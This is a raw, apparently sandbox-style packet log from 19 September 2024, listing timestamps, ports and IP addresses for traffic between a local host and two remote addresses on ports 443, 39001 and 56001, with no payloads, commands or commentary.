Sep 19, 2024 02:41:43.589173079 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.589766979 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.589785099 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.589961052 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.589976072 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.590064049 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.590698004 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.590714931 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.590857983 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.590871096 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.590935946 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.591039896 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.591666937 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.591686964 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.591820002 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.591820002 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.591936111 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.591943026 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.592014074 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.592964888 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.592982054 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.593163967 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.593178034 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.593282938 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.593939066 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.593952894 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.594177961 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.594191074 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.594264984 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.594769955 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.594785929 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.594950914 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.594964981 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.595076084 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.595127106 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.595627069 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.595640898 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.595839977 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.595968962 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.595982075 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.596430063 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.596445084 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.596616983 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.596626997 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.596772909 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.597188950 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.597202063 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.597394943 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.597404957 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.597496033 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.598046064 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.598062038 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.598239899 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.598248959 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.598356009 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.598906040 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.598920107 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.599047899 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.599056959 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.599159956 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.599229097 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.599931955 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.599946976 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.600087881 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.600193977 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.600200891 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.600302935 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.600925922 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.600949049 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.601075888 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.601087093 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.601166010 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.601257086 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.601838112 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.601851940 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.601996899 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.602050066 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.602056026 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.602166891 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.602735996 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.602756023 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.602909088 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.602917910 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.603038073 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.603858948 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.603876114 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.603975058 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.603987932 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.603991985 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.604104996 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.604207993 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.610325098 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.670175076 CEST	39001	49841	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:43.670331955 CEST	49841	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:43.853492022 CEST	39001	49841	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:43.901724100 CEST	49841	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:44.076324940 CEST	39001	49841	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:44.077053070 CEST	49841	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:44.183618069 CEST	49843	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:44.251729012 CEST	39001	49841	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:44.252588987 CEST	39001	49841	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:44.252724886 CEST	49841	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:44.363924026 CEST	39001	49843	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:44.364084959 CEST	49843	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:45.439671993 CEST	49843	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:45.827267885 CEST	39001	49843	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:45.827456951 CEST	49843	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:46.009799004 CEST	39001	49843	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:46.057378054 CEST	49843	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:46.236741066 CEST	39001	49843	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:46.237441063 CEST	49843	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:46.355015039 CEST	49844	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:46.416362047 CEST	39001	49843	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:46.416584969 CEST	49843	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:46.530268908 CEST	39001	49844	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:46.530648947 CEST	49844	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:46.772253036 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:46.822909117 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:46.997822046 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.006970882 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.234873056 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.235069990 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.460949898 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.461656094 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.461688042 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.461779118 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.461869001 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.461896896 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.462050915 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.462075949 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.462150097 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.462152958 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.462244034 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.462297916 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.462399006 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.462414026 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.462420940 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.462582111 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.462635994 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.462682009 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.462933064 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.596584082 CEST	49844	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.636878967 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.636910915 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.637216091 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.638040066 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.638254881 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.638370991 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.638422012 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.638492107 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.638514996 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.638545036 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.638592005 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.638627052 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.638747931 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.638768911 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.638894081 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.638999939 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.639020920 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.639158964 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.639239073 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.639241934 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.639399052 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.639498949 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.639566898 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.639645100 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.639708996 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.639750957 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.639775991 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.639878035 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.639982939 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.640034914 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.640129089 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.640239954 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.640464067 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.812845945 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.812895060 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.812947035 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.812968969 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.813096046 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.813144922 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.813514948 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.813575983 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.813594103 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.813632011 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.813684940 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.813755989 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.813769102 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.813808918 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.813827038 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.813853025 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.813873053 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.813924074 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.813924074 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.813941002 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.813958883 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.813975096 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.813988924 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.814027071 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.814133883 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.814146042 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.814186096 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.814203024 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.814249039 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.814322948 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.814344883 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.814367056 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.814367056 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.814548969 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.815510035 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.815687895 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.815742016 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.815758944 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.815776110 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.815793037 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.815823078 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.815951109 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.815968990 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.815985918 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.816004038 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.816020966 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.816044092 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.816081047 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.816108942 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.816144943 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.816200018 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.816246033 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.816263914 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.816281080 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.816291094 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.816381931 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.816538095 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.816538095 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.936698914 CEST	39001	49844	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.936873913 CEST	49844	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.988055944 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.988220930 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.988270998 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.988298893 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.988466024 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.988473892 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.988497019 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.988519907 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.988579035 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.988596916 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.988627911 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.988763094 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.988790989 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.988864899 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.988883972 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.989029884 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.989097118 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.989116907 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.989145994 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.989259005 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.989274979 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.989403009 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.989428997 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.989481926 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.989527941 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.989572048 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.989590883 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.989645004 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.989718914 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.989753962 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.989805937 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.989873886 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.989882946 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.990001917 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.990020990 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.990088940 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.990104914 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.990147114 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.990169048 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.990247965 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.990259886 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.990266085 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.990395069 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.990416050 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.990430117 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.990479946 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.990520000 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.990598917 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.990603924 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.990675926 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.990731001 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.990792990 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.990847111 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.990899086 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.990923882 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.990979910 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.990988016 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.991034985 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.991137028 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.991143942 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.991209030 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.991266966 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.991287947 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.991364002 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.991380930 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.991470098 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.991482973 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.991522074 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.991533995 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.991611958 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.991678953 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.991689920 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.991729975 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.991899014 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.991925955 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.991981983 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.992000103 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.992086887 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.992139101 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.992158890 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.992224932 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.992288113 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.992357016 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.992430925 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.992480993 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.992549896 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.992640018 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.992691994 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.992717028 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.992783070 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.992805958 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.992851019 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.992899895 CEST	49839	56001	192.168.11.30	45.11.229.96
